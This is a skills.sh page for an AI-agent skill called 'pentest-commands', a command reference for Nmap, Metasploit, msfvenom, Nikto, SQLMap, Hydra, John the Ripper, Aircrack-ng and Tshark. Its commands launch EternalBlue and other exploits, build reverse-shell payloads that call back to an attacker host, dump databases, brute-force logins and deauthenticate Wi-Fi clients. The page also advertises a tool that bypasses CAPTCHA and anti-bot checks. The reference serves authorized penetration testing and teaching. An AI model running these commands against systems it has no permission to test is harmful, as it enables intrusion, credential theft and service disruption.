DiscordSign up
SKILLS.SH

pentest-commands

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application…

INSTALLATION
npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill pentest-commands
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.

Pentest Commands

Purpose

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.

Inputs/Prerequisites

  • Kali Linux or penetration testing distribution
  • Target IP addresses with authorization
  • Wordlists for brute forcing
  • Network access to target systems
  • Basic understanding of tool syntax

Outputs/Deliverables

  • Network enumeration results
  • Identified vulnerabilities
  • Exploitation payloads
  • Cracked credentials
  • Web vulnerability findings

Core Workflow

1. Nmap Commands

Host Discovery:

# Ping sweep

nmap -sP 192.168.1.0/24

# List IPs without scanning

nmap -sL 192.168.1.0/24

# Ping scan (host discovery)

nmap -sn 192.168.1.0/24

Port Scanning:

# TCP SYN scan (stealth)

nmap -sS 192.168.1.1

# Full TCP connect scan

nmap -sT 192.168.1.1

# UDP scan

nmap -sU 192.168.1.1

# All ports (1-65535)

nmap -p- 192.168.1.1

# Specific ports

nmap -p 22,80,443 192.168.1.1

Service Detection:

# Service versions

nmap -sV 192.168.1.1

# OS detection

nmap -O 192.168.1.1

# Comprehensive scan

nmap -A 192.168.1.1

# Skip host discovery

nmap -Pn 192.168.1.1

NSE Scripts:

# Vulnerability scan

nmap --script vuln 192.168.1.1

# SMB enumeration

nmap --script smb-enum-shares -p 445 192.168.1.1

# HTTP enumeration

nmap --script http-enum -p 80 192.168.1.1

# Check EternalBlue

nmap --script smb-vuln-ms17-010 192.168.1.1

# Check MS08-067

nmap --script smb-vuln-ms08-067 192.168.1.1

# SSH brute force

nmap --script ssh-brute -p 22 192.168.1.1

# FTP anonymous

nmap --script ftp-anon 192.168.1.1

# DNS brute force

nmap --script dns-brute 192.168.1.1

# HTTP methods

nmap -p80 --script http-methods 192.168.1.1

# HTTP headers

nmap -p80 --script http-headers 192.168.1.1

# SQL injection check

nmap --script http-sql-injection -p 80 192.168.1.1

Advanced Scans:

# Xmas scan

nmap -sX 192.168.1.1

# ACK scan (firewall detection)

nmap -sA 192.168.1.1

# Window scan

nmap -sW 192.168.1.1

# Traceroute

nmap --traceroute 192.168.1.1

2. Metasploit Commands

Basic Usage:

# Launch Metasploit

msfconsole

# Search for exploits

search type:exploit name:smb

# Use exploit

use exploit/windows/smb/ms17_010_eternalblue

# Show options

show options

# Set target

set RHOST 192.168.1.1

# Set payload

set PAYLOAD windows/meterpreter/reverse_tcp

# Run exploit

exploit

Common Exploits:

# EternalBlue

msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"

# MS08-067 (Conficker)

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"

# vsftpd backdoor

msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"

# Shellshock

msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"

# Drupalgeddon2

msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"

# PSExec

msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"

Scanners:

# TCP port scan

msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"

# SMB version scan

msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"

# SMB share enumeration

msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"

# SSH brute force

msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# FTP brute force

msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# RDP scanning

msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"

Handler Setup:

# Multi-handler for reverse shells

msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"

Payload Generation (msfvenom):

# Windows reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe

# Linux reverse shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

# PHP reverse shell

msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

# ASP reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp

# WAR file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war

# Python payload

msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py

3. Nikto Commands

# Basic scan

nikto -h http://192.168.1.1

# Comprehensive scan

nikto -h http://192.168.1.1 -C all

# Output to file

nikto -h http://192.168.1.1 -output report.html

# Plugin-based scans

nikto -h http://192.168.1.1 -Plugins robots

nikto -h http://192.168.1.1 -Plugins shellshock

nikto -h http://192.168.1.1 -Plugins heartbleed

nikto -h http://192.168.1.1 -Plugins ssl

# Export to Metasploit

nikto -h http://192.168.1.1 -Format msf+

# Specific tuning

nikto -h http://192.168.1.1 -Tuning 1  # Interesting files only

4. SQLMap Commands

# Basic injection test

sqlmap -u "http://192.168.1.1/page?id=1"

# Enumerate databases

sqlmap -u "http://192.168.1.1/page?id=1" --dbs

# Enumerate tables

sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables

# Dump table

sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump

# OS shell

sqlmap -u "http://192.168.1.1/page?id=1" --os-shell

# POST request

sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"

# Cookie injection

sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"

# Bypass WAF

sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment

# Risk and level

sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5

5. Hydra Commands

# SSH brute force

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# FTP brute force

hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1

# HTTP POST form

hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# HTTP Basic Auth

hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/

# SMB brute force

hydra -l admin -P passwords.txt smb://192.168.1.1

# RDP brute force

hydra -l admin -P passwords.txt rdp://192.168.1.1

# MySQL brute force

hydra -l root -P passwords.txt mysql://192.168.1.1

# Username list

hydra -L users.txt -P passwords.txt ssh://192.168.1.1

6. John the Ripper Commands

# Crack password file

john hash.txt

# Specify wordlist

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked passwords

john hash.txt --show

# Specify format

john hash.txt --format=raw-md5

john hash.txt --format=nt

john hash.txt --format=sha512crypt

# SSH key passphrase

ssh2john id_rsa > ssh_hash.txt

john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# ZIP password

zip2john file.zip > zip_hash.txt

john zip_hash.txt

7. Aircrack-ng Commands

# Monitor mode

airmon-ng start wlan0

# Capture packets

airodump-ng wlan0mon

# Target specific network

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack

aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

8. Wireshark/Tshark Commands

# Capture traffic

tshark -i eth0 -w capture.pcap

# Read capture file

tshark -r capture.pcap

# Filter by protocol

tshark -r capture.pcap -Y "http"

# Filter by IP

tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"

# Extract HTTP data

tshark -r capture.pcap -Y "http" -T fields -e http.request.uri

Quick Reference

Common Port Scans

# Quick scan

nmap -F 192.168.1.1

# Full comprehensive

nmap -sV -sC -A -p- 192.168.1.1

# Fast with version

nmap -sV -T4 192.168.1.1

Password Hash Types

Mode

Type

0

MD5

100

SHA1

1000

NTLM

1800

sha512crypt

3200

bcrypt

13100

Kerberoast

Constraints

  • Always have written authorization
  • Some scans are noisy and detectable
  • Brute forcing may lock accounts
  • Rate limiting affects tools

Examples

Example 1: Quick Vulnerability Scan

nmap -sV --script vuln 192.168.1.1

Example 2: Web App Test

nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs

Troubleshooting

Issue

Solution

Scan too slow

Increase timing (-T4, -T5)

Ports filtered

Try different scan types

Exploit fails

Check target version compatibility

Passwords not cracking

Try larger wordlists, rules

When to Use

This skill is applicable to execute the workflow or actions described in the overview.

BrowserAct

Let your agent run on any real-world website

Bypass CAPTCHA & anti-bot for free. Start local, scale to cloud.

Explore BrowserAct Skills →

Related skills

azure-compliance
3/3

Azure compliance scanning, Key Vault expiration auditing, and resource configuration validation. Runs azqr (Azure Quick Review) for comprehensive compliance assessment against best practices across subscriptions and resource groups Monitors Key Vault keys, secrets, and certificates for expiration dates and identifies items without expiration policies Detects orphaned, misconfigured, and non-compliant resources using Resource Graph queries Classifies findings by priority (Critical, High, Medium, Low) with remediation guidance for each issue

Verified authormicrosoft
SKILLS.SH
293K1.1K
2026-05-22
openclaw-secure-linux-cloud
1/3

Use when self-hosting OpenClaw on a cloud server, hardening a remote OpenClaw gateway, choosing between SSH tunneling, Tailscale, or reverse-proxy exposure, or…

xixu-me
SKILLS.SH
150K53
2026-05-22
entra-agent-id
3/3

Provision Microsoft Entra Agent Identity Blueprints, BlueprintPrincipals, and per-instance Agent Identities via Microsoft Graph, and configure OAuth 2.0 token…

Verified authormicrosoft
SKILLS.SH
59.1K1.1K
2026-05-21
firebase-security-rules-auditor
3/3

A skill to evaluate how secure Firestore security rules are. Use this when Firestore security rules are updated to ensure that the generated rules are…

firebase
SKILLS.SH
23.5K292
2026-05-21

Stop writing automation&scrapers

Install the CLI. Run your first Skill in 30 seconds. Scale when you're ready.

Start free
free · no credit card